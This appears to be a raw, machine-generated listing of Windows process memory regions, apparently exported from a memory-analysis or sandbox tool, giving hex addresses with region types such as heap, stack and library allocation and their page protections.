heap
page read and write
235D173B000
heap
page read and write
25340B02000
heap
page read and write
88EDDFE000
stack
page read and write
7E8D5FF000
stack
page read and write
161B1C60000
heap
page read and write
21A1A211000
heap
page read and write
1DA00090000
heap
page read and write
29196FC1000
heap
page read and write
270AF0E7000
heap
page read and write
220FF029000
heap
page read and write
1DA00098000
heap
page read and write
1619B050000
trusted library allocation
page read and write
1FDEF1C1000
heap
page read and write
235D1749000
heap
page read and write
2089B0AA000
heap
page read and write
270AEF5C000
heap
page read and write
436F5DE000
stack
page read and write
2089C994000
heap
page read and write
1DBD7CD3000
heap
page read and write
29AF1C51000
heap
page read and write
1ED46C86000
heap
page read and write
20C9574B000
heap
page read and write
161B17F0000
heap
page read and write
24132F6C000
heap
page read and write
1DBD7CA7000
heap
page read and write
2B4B8B80000
heap
page read and write
F7881FF000
stack
page read and write
7FFE904FB000
unkown
page read and write
20492B39000
heap
page read and write
A9296FC000
stack
page read and write
174CED4B000
heap
page read and write
2089AFB4000
heap
page read and write
24133D1F000
heap
page read and write
18207AC8000
heap
page read and write
20D8057B000
heap
page read and write
9D3AAFF000
unkown
page read and write
24133609000
heap
page read and write
2A2CC668000
heap
page read and write
18859AD0000
heap
page read and write
20492A30000
heap
page read and write
241334D9000
heap
page read and write
241333C6000
heap
page read and write
359F67F000
stack
page read and write
2533EA22000
heap
page read and write
1FB145E4000
heap
page read and write
EFF6FAD000
stack
page read and write
2D87B7BF000
heap
page read and write
2413351F000
heap
page read and write
29AF1BC0000
heap
page read and write
24132C39000
heap
page read and write
1DBD9E74000
heap
page read and write
291970C0000
heap
page read and write
1DBD84D4000
heap
page read and write
1DAD01D4000
heap
page read and write
1E2C98B3000
heap
page read and write
270AF0EA000
heap
page read and write
2F8EB7F000
stack
page read and write
29ADF680000
heap
page read and write
1E2C98D2000
heap
page read and write
24133495000
heap
page read and write
5BF15FF000
stack
page read and write
244383C5000
heap
page read and write
7FFE15EE0000
trusted library allocation
page read and write
1ED46C37000
heap
page read and write
2D87B780000
heap
page execute and read and write
2D87B610000
trusted library allocation
page read and write
1DACF03A000
heap
page read and write
24132B71000
heap
page read and write
1DB1C58B000
heap
page read and write
2413349E000
heap
page read and write
2533F274000
heap
page read and write
25340B01000
heap
page read and write
226F4FB0000
heap
page read and write
7FFE15E20000
trusted library allocation
page read and write
1F16B1B0000
trusted library allocation
page read and write
20492B5C000
heap
page read and write
1FABFC5E000
heap
page read and write
1DACCFAE000
heap
page read and write
1DBD7D1B000
heap
page read and write
237532C0000
heap
page read and write
24132E75000
heap
page read and write
1F16B1F0000
heap
page read and write
20492B62000
heap
page read and write
7FFE15E50000
trusted library allocation
page read and write
1DA00092000
heap
page read and write
253D9013000
direct allocation
page read and write
1616DC77000
heap
page read and write
161A989D000
trusted library allocation
page read and write
1AEA6E03000
heap
page read and write
1DA002C8000
heap
page read and write
24438270000
heap
page read and write
270AEF5F000
heap
page read and write
1DA002A8000
heap
page read and write
2D80135B000
trusted library allocation
page read and write
FC5157E000
stack
page read and write
270AEF30000
heap
page read and write
69F5BBB000
stack
page read and write
1DBD84EF000
heap
page read and write
2413342C000
heap
page read and write
24130A60000
heap
page read and write
2089AFA9000
heap
page read and write
1E02DC80000
heap
page read and write
235D1751000
heap
page read and write
1D3E26A0000
heap
page read and write
7FFE15DB0000
trusted library allocation
page read and write
270AE6A6000
heap
page read and write
161A96E1000
trusted library allocation
page read and write
24133EB6000
heap
page read and write
1F16B203000
heap
page read and write
241338C0000
direct allocation
page read and write
24132C07000
heap
page read and write
2413344D000
heap
page read and write
161B189B000
heap
page read and write
7FFE15ABD000
trusted library allocation
page execute and read and write
241334DB000
heap
page read and write
270AEF61000
heap
page read and write
24133938000
direct allocation
page read and write
1616DDEB000
heap
page read and write
24132C4B000
heap
page read and write
283A0FF000
unkown
page read and write
1CAA8050000
heap
page read and write
174CED5B000
heap
page read and write
1DBD7CFB000
heap
page read and write
2D87BD73000
heap
page read and write
2413343B000
heap
page read and write
A2B4EFE000
stack
page read and write
152B53C0000
heap
page read and write
2D879C80000
heap
page read and write
1DBD7D40000
heap
page read and write
20C95674000
heap
page read and write
24133041000
heap
page read and write
1F61A3EB000
heap
page read and write
2533F117000
heap
page read and write
7FFE765C0000
unkown
page execute and read and write
7FFE90B73000
unkown
page execute and read and write
235D1751000
heap
page read and write
20492ACE000
heap
page read and write
1F16D1AE000
heap
page read and write
253D8E12000
heap
page read and write
29AF1C51000
heap
page read and write
1DBD8375000
heap
page read and write
1DA002D9000
heap
page read and write
18207AD1000
heap
page read and write
1F16B26A000
heap
page read and write
1DACCEFD000
heap
page read and write
2089AAA2000
heap
page read and write
1FAC1504000
heap
page read and write
1616DC9F000
heap
page read and write
7FFE75CE2000
unkown
page execute and read and write
241334FA000
heap
page read and write
7FFE904F8000
unkown
page execute and read and write
24133657000
heap
page read and write
62E187C000
stack
page read and write
1DA002BE000
heap
page read and write
2089AF87000
heap
page read and write
24AB732B000
heap
page read and write
20494505000
trusted library allocation
page read and write
1FAC15F0000
heap
page read and write
226F4C50000
heap
page read and write
7C2DA7F000
stack
page read and write
2413352F000
heap
page read and write
2F8EA7B000
stack
page read and write
253D8E28000
heap
page read and write
253D8DFC000
heap
page read and write
20C95668000
heap
page read and write
29196FC1000
heap
page read and write
1616DD80000
trusted library allocation
page read and write
24132E79000
heap
page read and write
1FABF662000
heap
page read and write
198520B0000
heap
page read and write
2221A560000
heap
page read and write
7FFE15E39000
trusted library allocation
page read and write
1DBD84EF000
heap
page read and write
2533EA4E000
heap
page read and write
CB30DFF000
unkown
page read and write
2089AAA3000
heap
page read and write
1FABF68F000
heap
page read and write
20492A00000
heap
page read and write
7FFE15CD0000
trusted library allocation
page read and write
1AEA6E11000
heap
page read and write
1ED46C8B000
heap
page read and write
174CED20000
heap
page read and write
1616DCAA000
heap
page read and write
1F16B229000
heap
page read and write
1F1A8ABB000
heap
page read and write
1FDEF130000
heap
page read and write
2D87C330000
heap
page read and write
2089B0A5000
heap
page read and write
2413351B000
heap
page read and write
1F16D1AD000
heap
page read and write
1DA002B6000
heap
page read and write
7B4EBAE000
stack
page read and write
18FDFC40000
heap
page read and write
174CED7F000
heap
page read and write
1DA0082B000
heap
page read and write
1B7EECB0000
heap
page read and write
88EDA7B000
stack
page read and write
2413350E000
heap
page read and write
25340B06000
heap
page read and write
1984C88D000
heap
page read and write
24133565000
heap
page read and write
2D87B900000
trusted library allocation
page read and write
24132C4F000
heap
page read and write
24133388000
heap
page read and write
6E7852F000
stack
page read and write
20C95654000
heap
page read and write
24132F64000
heap
page read and write
7C2D74B000
stack
page read and write
2263E5D1000
heap
page read and write
21A1A208000
heap
page read and write
2B4B891A000
heap
page read and write
241334AE000
heap
page read and write
24132E80000
heap
page read and write
1C8A5FE0000
heap
page read and write
4DF8BFF000
unkown
page read and write
1616DCA8000
heap
page read and write
24132BF1000
heap
page read and write
F430EFC000
stack
page read and write
8FB2CFC000
stack
page read and write
88EE2FE000
stack
page read and write
29426007000
heap
page read and write
20492A10000
heap
page read and write
7FFE94456000
unkown
page execute and write copy
17134990000
heap
page read and write
24130A49000
heap
page read and write
20C95757000
heap
page read and write
270AEF48000
heap
page read and write
1DBD7CF3000
heap
page read and write
1DAD0152000
heap
page read and write
20492B36000
heap
page read and write
24133B00000
heap
page read and write
7FFE15E0C000
trusted library allocation
page read and write
18FDFB40000
heap
page read and write
7FF7C728E000
unkown
page readonly
1D3E24A0000
heap
page read and write
16197AA4000
heap
page read and write
270AF0E2000
heap
page read and write
1DA002AE000
heap
page read and write
29AF1B90000
heap
page read and write
24133539000
heap
page read and write
2125C3B1000
heap
page read and write
241333B0000
heap
page read and write
7FFE15C94000
trusted library allocation
page read and write
29AF1FE0000
heap
page read and write
2263E5B0000
heap
page read and write
FE67FFF000
stack
page read and write
1984DD40000
trusted library allocation
page read and write
54750FC000
stack
page read and write
270AE5F6000
heap
page read and write
24133473000
heap
page read and write
20C95621000
heap
page read and write
5D5CCB8000
stack
page read and write
1F16B241000
heap
page read and write
109D37C000
stack
page read and write
1616DE22000
heap
page read and write
2413366F000
heap
page read and write
23639991000
heap
page read and write
1DBD7CA5000
heap
page read and write
1DBD84D8000
heap
page read and write
20492B4D000
heap
page read and write
1DB1C5A1000
heap
page read and write
1FABF610000
heap
page read and write
1984C8B4000
heap
page read and write
24132E80000
heap
page read and write
7FFE15E40000
trusted library allocation
page read and write
2D87BCD0000
heap
page read and write
20492B27000
heap
page read and write
2413352D000
heap
page read and write
7FFE15C74000
trusted library allocation
page read and write
3B9ACFF000
stack
page read and write
1ED4720E000
heap
page read and write
20492B3C000
heap
page read and write
2089AF97000
heap
page read and write
1F16B258000
heap
page read and write
253DC519000
direct allocation
page read and write
2221A579000
heap
page read and write
24133497000
heap
page read and write
24132E7E000
heap
page read and write
24133473000
heap
page read and write
2D801781000
trusted library allocation
page read and write
A2B4FFF000
stack
page read and write
20C95621000
heap
page read and write
1DA00210000
heap
page read and write
7FFE7663A000
unkown
page execute and write copy
24EACFF0000
heap
page read and write
253D8DE3000
heap
page read and write
1DACCFAA000
heap
page read and write
24132B91000
heap
page read and write
1DBD84E9000
heap
page read and write
2089AAA9000
heap
page read and write
20C94ACE000
trusted library allocation
page read and write
C2A09FF000
stack
page read and write
1DA00130000
heap
page read and write
24132C48000
heap
page read and write
1DBD9E50000
heap
page read and write
EA74147000
stack
page read and write
2089AFA9000
heap
page read and write
24130AA0000
heap
page read and write
253D8DFE000
heap
page read and write
24133330000
heap
page read and write
2413344D000
heap
page read and write
24133EBB000
heap
page read and write
253D8E36000
heap
page read and write
7FF6FFC7B000
unkown
page readonly
1984C913000
heap
page read and write
241333C6000
heap
page read and write
FC514F7000
stack
page read and write
1DBD84CC000
heap
page read and write
2F08D8F000
stack
page read and write
1F61A3F9000
heap
page read and write
1ED47228000
heap
page read and write
2413366B000
heap
page read and write
7FF6FFC8E000
unkown
page write copy
1C8A6060000
heap
page read and write
1FABFC6E000
heap
page read and write
24133F79000
heap
page read and write
2089AA76000
heap
page read and write
25340C30000
heap
page read and write
2089AF8F000
heap
page read and write
7FFE76182000
unkown
page execute and read and write
24133ECB000
heap
page read and write
2263E5D1000
heap
page read and write
270AE5E3000
heap
page read and write
237533A0000
heap
page read and write
20492ACE000
heap
page read and write
24133FC2000
heap
page read and write
20C95613000
heap
page read and write
24132C4F000
heap
page read and write
1D3E2580000
heap
page read and write
1FABFC6E000
heap
page read and write
7FFE90B60000
unkown
page readonly
1616DE25000
heap
page read and write
241334A6000
heap
page read and write
24133392000
heap
page read and write
24133F9D000
heap
page read and write
20C9574C000
heap
page read and write
198520BE000
heap
page read and write
7FFE905A7000
unkown
page execute and read and write
1DBD84EC000
heap
page read and write
18859B88000
heap
page read and write
2D801E20000
trusted library allocation
page read and write
7FFE761AD000
unkown
page execute and read and write
24132730000
direct allocation
page read and write
24133619000
heap
page read and write
20492B62000
heap
page read and write
109D5F6000
stack
page read and write
1E777BD0000
heap
page read and write
1F61A3E5000
heap
page read and write
7FFE15C4A000
trusted library allocation
page read and write
7FFE15B96000
trusted library allocation
page execute and read and write
24132C0F000
heap
page read and write
2A2CC560000
heap
page read and write
24132C00000
heap
page read and write
24132C12000
heap
page read and write
235D1751000
heap
page read and write
1FABF664000
heap
page read and write
2413364A000
heap
page read and write
1D3E27E0000
heap
page read and write
220FEF80000
heap
page read and write
18FDFEA0000
heap
page read and write
24133F9D000
heap
page read and write
1DACF970000
heap
page read and write
161B1CA3000
heap
page read and write
17134AC5000
heap
page read and write
16197872000
heap
page read and write
24ECC302000
heap
page read and write
1616DC95000
heap
page read and write
7FFE15E00000
trusted library allocation
page read and write
253D8E00000
heap
page read and write
6051EC8000
stack
page read and write
241333A0000
heap
page read and write
1DA002D1000
heap
page read and write
2A2CC750000
heap
page read and write
24132FA6000
heap
page read and write
29ADF940000
heap
page read and write
1DBD7E80000
trusted library allocation
page read and write
2D8102ED000
trusted library allocation
page read and write
241323E4000
heap
page read and write
FC512FF000
stack
page read and write
2533EA10000
heap
page read and write
2360FC60000
heap
page read and write
1DBD7CAB000
heap
page read and write
2D879CBF000
heap
page read and write
2D879CEB000
heap
page read and write
F257FFF000
unkown
page read and write
24133515000
heap
page read and write
20492B12000
heap
page read and write
7FFE75C80000
unkown
page readonly
2533F27E000
heap
page read and write
2413344D000
heap
page read and write
253D8E04000
heap
page read and write
7FFE15AEC000
trusted library allocation
page execute and read and write
7FFE75E6D000
unkown
page execute and read and write
8FCCEFF000
stack
page read and write
DFDE87F000
stack
page read and write
2360FCB2000
heap
page read and write
54752FF000
stack
page read and write
20C9566C000
heap
page read and write
24132E76000
heap
page read and write
17134BD0000
heap
page read and write
1984D640000
trusted library allocation
page read and write
7FFE15CE0000
trusted library allocation
page read and write
2D87B7A6000
heap
page read and write
1DF54D21000
heap
page read and write
3B0567E000
stack
page read and write
36103FF000
unkown
page read and write
1DA000AE000
heap
page read and write
2413365C000
heap
page read and write
1DA003AE000
heap
page read and write
19851E38000
trusted library allocation
page read and write
24133483000
heap
page read and write
24133D21000
heap
page read and write
24132BF9000
heap
page read and write
1FABF8EB000
heap
page read and write
18D3475D000
heap
page read and write
24132BDC000
heap
page read and write
1DA00072000
heap
page read and write
2221A450000
heap
page read and write
270AE68E000
heap
page read and write
1F16D1A3000
heap
page read and write
1AEA6E36000
heap
page read and write
1FABF649000
heap
page read and write
2221A581000
heap
page read and write
1984D102000
heap
page read and write
1CFB9730000
heap
page read and write
1AEA6E03000
heap
page read and write
1984D9E0000
trusted library section
page readonly
20C955F2000
heap
page read and write
1DBD7D24000
heap
page read and write
2D80188D000
trusted library allocation
page read and write
7FFE765FD000
unkown
page execute and read and write
1ED47210000
heap
page read and write
2533F273000
heap
page read and write
1FABFC6E000
heap
page read and write
1FAC1504000
heap
page read and write
1DBD7D28000
heap
page read and write
88EDCFE000
stack
page read and write
24133070000
direct allocation
page read and write
1FABFC78000
heap
page read and write
7FFE99DB0000
unkown
page readonly
24132BE5000
heap
page read and write
161978A9000
heap
page read and write
7FFE761E0000
unkown
page readonly
C758B7C000
stack
page read and write
19852020000
heap
page read and write
2089AA9B000
heap
page read and write
7FFE15DB0000
trusted library allocation
page read and write
1DA00064000
heap
page read and write
1AEA6E34000
heap
page read and write
1C46EC31000
heap
page read and write
1FABF677000
heap
page read and write
253D8E0C000
heap
page read and write
20492B6E000
heap
page read and write
20492B12000
heap
page read and write
2263E6B0000
heap
page read and write
1ED46C86000
heap
page read and write
24132BFB000
heap
page read and write
2533F113000
heap
page read and write
16197866000
heap
page read and write
55CA9FE000
stack
page read and write
7FFE8FF71000
unkown
page execute and read and write
1FABFC81000
heap
page read and write
1F61A370000
heap
page read and write
24133B94000
heap
page read and write
20C94C80000
trusted library allocation
page execute
1984CF90000
trusted library section
page read and write
1CFB9720000
heap
page read and write
20C95619000
heap
page read and write
20492AB0000
heap
page read and write
244383D0000
heap
page read and write
20C9561B000
heap
page read and write
2089AF94000
heap
page read and write
7FFE7612F000
unkown
page execute and read and write
55CA97F000
stack
page read and write
359F35E000
stack
page read and write
1FABFC64000
heap
page read and write
24130A9F000
heap
page read and write
281B5CF0000
heap
page read and write
24133521000
heap
page read and write
1DA02124000
heap
page read and write
2125DDD5000
heap
page read and write
2089AC3A000
heap
page read and write
2413338C000
heap
page read and write
270AE649000
heap
page read and write
1616DDE0000
heap
page read and write
241333A4000
heap
page read and write
24133FA6000
heap
page read and write
1CFB9640000
heap
page read and write
2533EA3C000
heap
page read and write
1F61A40F000
heap
page read and write
1DBD84F2000
heap
page read and write
1B5C25B1000
heap
page read and write
24133542000
heap
page read and write
24133F9C000
heap
page read and write
1DACE790000
heap
page read and write
7FFE15CD0000
trusted library allocation
page read and write
EFF72FF000
stack
page read and write
55CA5AB000
stack
page read and write
241333C2000
heap
page read and write
24132C58000
heap
page read and write
7FFE15DC0000
trusted library allocation
page read and write
69990FC000
stack
page read and write
1C46EC31000
heap
page read and write
2413307F000
heap
page read and write
1ED46C05000
heap
page read and write
1FABF688000
heap
page read and write
198520F9000
heap
page read and write
2533F272000
heap
page read and write
24132E7E000
heap
page read and write
1F16B296000
heap
page read and write
24133557000
heap
page read and write
1C3C5917000
heap
page read and write
7FFE15CA0000
trusted library allocation
page execute and read and write
2533EBE0000
trusted library allocation
page read and write
2089AF9D000
heap
page read and write
24133FA0000
heap
page read and write
24133619000
heap
page read and write
161B1960000
trusted library section
page read and write
24134410000
trusted library allocation
page read and write
1DBD7CF8000
heap
page read and write
1984C82B000
heap
page read and write
16199A66000
trusted library allocation
page read and write
7FFE15DF2000
trusted library allocation
page read and write
7FF6FFC51000
unkown
page execute read
1DA00098000
heap
page read and write
253D8DC0000
heap
page read and write
24133D37000
heap
page read and write
1DBD84D4000
heap
page read and write
1FABF66E000
heap
page read and write
1F61A390000
heap
page read and write
253D8E81000
heap
page read and write
20C9561B000
heap
page read and write
2D87BD6F000
heap
page read and write
1619A5B8000
trusted library allocation
page read and write
20D80591000
heap
page read and write
1616DCAB000
heap
page read and write
7FFE905B1000
unkown
page execute and write copy
2533EA39000
heap
page read and write
20492AF5000
heap
page read and write
24133473000
heap
page read and write
24133495000
heap
page read and write
1DBD9E6E000
heap
page read and write
2533EA46000
heap
page read and write
24133393000
heap
page read and write
7FFE15C80000
trusted library allocation
page execute and read and write
24132C07000
heap
page read and write
24133561000
heap
page read and write
2B4B8880000
heap
page read and write
24133675000
heap
page read and write
2089AABC000
heap
page read and write
20492B4D000
heap
page read and write
1DAD014A000
heap
page read and write
1CFB9489000
heap
page read and write
2089AF9D000
heap
page read and write
24132E7D000
heap
page read and write
270AE68E000
heap
page read and write
20C95670000
heap
page read and write
1DBD84F0000
heap
page read and write
88EE17E000
unkown
page readonly
1DA00740000
heap
page read and write
20C94ADD000
trusted library allocation
page read and write
1DBD7C85000
heap
page read and write
24133539000
heap
page read and write
1DA00095000
heap
page read and write
2413354A000
heap
page read and write
1619990A000
trusted library allocation
page read and write
7FFE15B66000
trusted library allocation
page read and write
24133525000
heap
page read and write
2089AA90000
heap
page read and write
2533F112000
heap
page read and write
1DA00250000
trusted library allocation
page read and write
2413352F000
heap
page read and write
2221A834000
heap
page read and write
20D80784000
heap
page read and write
24133042000
heap
page read and write
7FFE15D20000
trusted library allocation
page read and write
1ED0FC54000
heap
page read and write
24130A8A000
heap
page read and write
24438267000
heap
page read and write
270AE612000
heap
page read and write
FC517FE000
stack
page read and write
152B5554000
heap
page read and write
1ED48B02000
heap
page read and write
23FDF07B000
heap
page read and write
20C94AC9000
trusted library allocation
page read and write
20C95753000
heap
page read and write
2533EA22000
heap
page read and write
2221A577000
heap
page read and write
2263E4B0000
heap
page read and write
1616DCBF000
heap
page read and write
1869CD34000
heap
page read and write
241335A9000
heap
page read and write
270AE643000
heap
page read and write
2D800D6A000
trusted library allocation
page read and write
1FABF4A0000
heap
page read and write
1FB145B0000
heap
page read and write
359F6FE000
stack
page read and write
24438270000
heap
page read and write
1DBD7C86000
heap
page read and write
C68D2FC000
stack
page read and write
20492B2A000
heap
page read and write
1619B39D000
trusted library allocation
page read and write
1ED46C07000
heap
page read and write
2533EBA0000
heap
page read and write
23753457000
heap
page read and write
24130A42000
heap
page read and write
287A3990000
heap
page read and write
1616DDFC000
heap
page read and write
20492C60000
trusted library allocation
page read and write
253DA990000
heap
page read and write
1DA00092000
heap
page read and write
2533EA2A000
heap
page read and write
1FAC14FD000
heap
page read and write
1C46EC31000
heap
page read and write
1616DE1F000
heap
page read and write
24132C41000
heap
page read and write
241334A8000
heap
page read and write
2413351B000
heap
page read and write
24133525000
heap
page read and write
20C95757000
heap
page read and write
AB1B57E000
stack
page read and write
270AEF72000
heap
page read and write
24132C05000
heap
page read and write
1FABF5C0000
trusted library allocation
page read and write
1F61A40D000
heap
page read and write
198520C0000
heap
page read and write
1DA000A8000
heap
page read and write
24132C39000
heap
page read and write
5F117E000
stack
page read and write
270AEF7E000
heap
page read and write
270AEF4E000
heap
page read and write
1C3C5BB4000
heap
page read and write
1DA000A1000
heap
page read and write
253D8E6A000
heap
page read and write
2413352D000
heap
page read and write
20C95757000
heap
page read and write
241334D9000
heap
page read and write
270AE68E000
heap
page read and write
20C955F8000
heap
page read and write
241333C4000
heap
page read and write
253D8E4B000
heap
page read and write
7FFE764EE000
unkown
page execute and read and write
24130A31000
heap
page read and write
161B19B5000
heap
page read and write
1AEA6E28000
heap
page read and write
7FF7C7250000
unkown
page readonly
1F16B244000
heap
page read and write
24132B71000
heap
page read and write
7DF47ED60000
trusted library allocation
page execute and read and write
20C95621000
heap
page read and write
966087C000
stack
page read and write
24132C4F000
heap
page read and write
1DAD01A6000
heap
page read and write
20C9574D000
heap
page read and write
1CFB9491000
heap
page read and write
24133480000
heap
page read and write
7FF7C726A000
unkown
page read and write
1CAA7D71000
heap
page read and write
1984C87D000
heap
page read and write
24EACF70000
heap
page read and write
24133FA0000
heap
page read and write
20D80740000
heap
page read and write
24438270000
heap
page read and write
253DC410000
direct allocation
page read and write
17134AFB000
heap
page read and write
19851E10000
trusted library allocation
page read and write
253DA8F0000
direct allocation
page read and write
1DBD84E0000
heap
page read and write
1DBD84E9000
heap
page read and write
2413406F000
heap
page read and write
1ED46C93000
heap
page read and write
1FDEF100000
heap
page read and write
1ED48B01000
heap
page read and write
A2B50FD000
stack
page read and write
1FABF66D000
heap
page read and write
270AE6B0000
heap
page read and write
24133FD4000
heap
page read and write
24438270000
heap
page read and write
24133F91000
heap
page read and write
1FABFC78000
heap
page read and write
24130A63000
heap
page read and write
281B6164000
heap
page read and write
1F16B25C000
heap
page read and write
174CED59000
heap
page read and write
1DBD7D3C000
heap
page read and write
1616DE01000
heap
page read and write
1DBD84E0000
heap
page read and write
253D8E0A000
heap
page read and write
1DAD0164000
heap
page read and write
1DA0004E000
heap
page read and write
24132C56000
heap
page read and write
20492B09000
heap
page read and write
2089C9A4000
heap
page read and write
24133546000
heap
page read and write
1FABFC7D000
heap
page read and write
1DACCFB0000
heap
page readonly
24130A62000
heap
page read and write
24133486000
heap
page read and write
1FABF8E2000
heap
page read and write
2413350F000
heap
page read and write
20C95668000
heap
page read and write
1DA00824000
heap
page read and write
2360FCB2000
heap
page read and write
20492B12000
heap
page read and write
1C46EBF5000
heap
page read and write
270AE710000
heap
page read and write
5D5CD3E000
stack
page read and write
23FDEF90000
heap
page read and write
284F3430000
heap
page read and write
18207AD1000
heap
page read and write
1DA00083000
heap
page read and write
24132EB7000
heap
page read and write
1F877F90000
heap
page read and write
20C95746000
heap
page read and write
2413351B000
heap
page read and write
7FFE15AB2000
trusted library allocation
page read and write
220FF031000
heap
page read and write
2360FCAB000
heap
page read and write
1984C896000
heap
page read and write
2533ECD0000
heap
page read and write
1E777B90000
heap
page read and write
29426020000
heap
page read and write
271488F0000
heap
page read and write
7FFE8FF6E000
unkown
page execute and read and write
24133495000
heap
page read and write
1DA02112000
heap
page read and write
1DBD9E74000
heap
page read and write
1C8A5FF4000
heap
page read and write
1DA00280000
heap
page read and write
2B4B8931000
heap
page read and write
241334A0000
heap
page read and write
24132BF7000
heap
page read and write
1BFE6CE1000
heap
page read and write
270AEF60000
heap
page read and write
20C94AD0000
trusted library allocation
page read and write
2413351B000
heap
page read and write
24133659000
heap
page read and write
2C160BBB000
heap
page read and write
2413304F000
heap
page read and write
2360FC95000
heap
page read and write
16197A20000
trusted library allocation
page read and write
36104FF000
stack
page read and write
2533F275000
heap
page read and write
270AE643000
heap
page read and write
2533EA37000
heap
page read and write
270AE5B0000
heap
page read and write
1ED47228000
heap
page read and write
2B4B8931000
heap
page read and write
1616DCBF000
heap
page read and write
5BF17FF000
stack
page read and write
24132C31000
heap
page read and write
29425F30000
heap
page read and write
1AEA6E0B000
heap
page read and write
20C95740000
heap
page read and write
24133289000
heap
page read and write
1C46EB30000
heap
page read and write
1B5C2540000
heap
page read and write
7FFE94AC1000
unkown
page execute and read and write
2413366F000
heap
page read and write
2413366F000
heap
page read and write
241334A0000
heap
page read and write
1DA0211E000
heap
page read and write
2089AF8C000
heap
page read and write
270AE60C000
heap
page read and write
270AE649000
heap
page read and write
2413366B000
heap
page read and write
18859B76000
heap
page read and write
24132BEA000
heap
page read and write
1DBD9E64000
heap
page read and write
1DAD0164000
heap
page read and write
19851DD0000
trusted library allocation
page read and write
1B7EEC80000
heap
page read and write
24130A5D000
heap
page read and write
2413348F000
heap
page read and write
24133496000
heap
page read and write
20494511000
trusted library allocation
page read and write
24AB7280000
heap
page read and write
1616DE20000
heap
page read and write
1DAD017A000
heap
page read and write
1ED46C74000
heap
page read and write
79849FF000
unkown
page read and write
2E76AFF000
unkown
page read and write
23FDF091000
heap
page read and write
2C160BAB000
heap
page read and write
21A1A1F0000
heap
page read and write
1ED47207000
heap
page read and write
2D879BC0000
heap
page read and write
20492AEE000
heap
page read and write
D5770FC000
stack
page read and write
253D8DEB000
heap
page read and write
1616DDEA000
heap
page read and write
7FFE761B3000
unkown
page read and write
1616DC89000
heap
page read and write
24133557000
heap
page read and write
24133408000
heap
page read and write
1F878210000
heap
page read and write
1F16B8F7000
heap
page read and write
241334B0000
heap
page read and write
24133539000
heap
page read and write
1ED46C7E000
heap
page read and write
41A9B3D000
stack
page read and write
1616DDEE000
heap
page read and write
2533F289000
heap
page read and write
1619975D000
trusted library allocation
page read and write
244383C0000
heap
page read and write
910AF7C000
stack
page read and write
1616DCA7000
heap
page read and write
2089AF93000
heap
page read and write
1F16B28C000
heap
page read and write
88ED77E000
unkown
page readonly
2125C3BE000
heap
page read and write
1616DF0A000
heap
page read and write
241333A0000
heap
page read and write
152B5120000
heap
page read and write
1AEA6E28000
heap
page read and write
1E2C98CF000
heap
page read and write
19851F70000
remote allocation
page read and write
1ED0FB70000
heap
page read and write
7FFE15DA0000
trusted library allocation
page read and write
2089AAB7000
heap
page read and write
2413352F000
heap
page read and write
20C95670000
heap
page read and write
1616DCBA000
heap
page read and write
24133514000
heap
page read and write
24132C00000
heap
page read and write
20492AEE000
heap
page read and write
C584FC000
stack
page read and write
1ED46C93000
heap
page read and write
1FABF90A000
heap
page read and write
253DC519000
direct allocation
page read and write
7FFE784F0000
unkown
page readonly
1DBD84E9000
heap
page read and write
20C94AD4000
trusted library allocation
page read and write
20C95BD4000
heap
page read and write
270AE62F000
heap
page read and write
7FFE15CF0000
trusted library allocation
page read and write
1F16B238000
heap
page read and write
1DBD7D32000
heap
page read and write
1DAD00E8000
heap
page read and write
20C94AD6000
trusted library allocation
page read and write
2089A9E0000
heap
page read and write
18859BAC000
heap
page read and write
2089AAA7000
heap
page read and write
16197760000
heap
page read and write
1616DC95000
heap
page read and write
220FF031000
heap
page read and write
2089AF8F000
heap
page read and write
1DA0211D000
heap
page read and write
24130A60000
heap
page read and write
17134AEC000
heap
page read and write
2636AD50000
heap
page read and write
27148900000
heap
page read and write
7FFE15A93000
trusted library allocation
page execute and read and write
1AEA6FD0000
heap
page read and write
17134AF3000
heap
page read and write
18859AE0000
heap
page read and write
2533EA32000
heap
page read and write
284F3457000
heap
page read and write
2533E9D0000
heap
page read and write
2D810074000
trusted library allocation
page read and write
1F61A41D000
heap
page read and write
20C95654000
heap
page read and write
1DA00091000
heap
page read and write
3B054FF000
stack
page read and write
253D8E45000
heap
page read and write
1616DE1A000
heap
page read and write
1F61A3E6000
heap
page read and write
20492B0A000
heap
page read and write
7FFE15D00000
trusted library allocation
page read and write
270AEF31000
heap
page read and write
18859EAA000
heap
page read and write
19851DD1000
trusted library allocation
page read and write
2413338F000
heap
page read and write
24133690000
direct allocation
page read and write
2413395C000
direct allocation
page read and write
20492B24000
heap
page read and write
1DA002D1000
heap
page read and write
FC523CF000
stack
page read and write
253D8DFC000
heap
page read and write
AB1B37C000
stack
page read and write
241334A0000
heap
page read and write
20492B0A000
heap
page read and write
24133FBF000
heap
page read and write
24132BEA000
heap
page read and write
241333B0000
heap
page read and write
24133483000
heap
page read and write
29ADF761000
heap
page read and write
7FFE15C50000
trusted library allocation
page execute and read and write
24133579000
heap
page read and write
22E8B995000
heap
page read and write
24132C65000
heap
page read and write
24132E80000
heap
page read and write
241333A0000
heap
page read and write
20492B17000
heap
page read and write
284F3420000
heap
page read and write
20492A94000
heap
page read and write
7FFE75DA0000
unkown
page readonly
24132B8E000
heap
page read and write
2125C3B1000
heap
page read and write
7FFE15EF0000
trusted library allocation
page read and write
1869CB67000
heap
page read and write
25340B14000
heap
page read and write
5F127E000
stack
page read and write
1616DCA3000
heap
page read and write
1ED47231000
heap
page read and write
1DA02116000
heap
page read and write
2D87C044000
heap
page read and write
CD4F78F000
stack
page read and write
1E02DC60000
heap
page read and write
1D3E25A0000
heap
page read and write
1DBD84D1000
heap
page read and write
1FABF8E4000
heap
page read and write
7FF6FFC51000
unkown
page execute read
2413351E000
heap
page read and write
24EAD344000
heap
page read and write
7FFE957E6000
unkown
page read and write
253D8E73000
heap
page read and write
1DA00069000
heap
page read and write
1619939A000
heap
page read and write
25340B16000
heap
page read and write
2636AD5B000
heap
page read and write
21A1A504000
heap
page read and write
2125C3B1000
heap
page read and write
1DA002BE000
heap
page read and write
7FFE15DA6000
trusted library allocation
page read and write
1C46EC1B000
heap
page read and write
1DBD7F40000
heap
page read and write
1DBD7C91000
heap
page read and write
7FFE99E50000
unkown
page readonly
24133619000
heap
page read and write
1619AFF5000
trusted library allocation
page read and write
287A3C70000
heap
page read and write
152B5550000
heap
page read and write
1FAC14FE000
heap
page read and write
2D87BD58000
heap
page read and write
241333B0000
heap
page read and write
1DBD84E0000
heap
page read and write
FE67EFF000
unkown
page read and write
2089AA20000
trusted library allocation
page read and write
7FFE8FF81000
unkown
page execute and read and write
1FABF5C0000
trusted library allocation
page read and write
29196FC1000
heap
page read and write
18FDFC20000
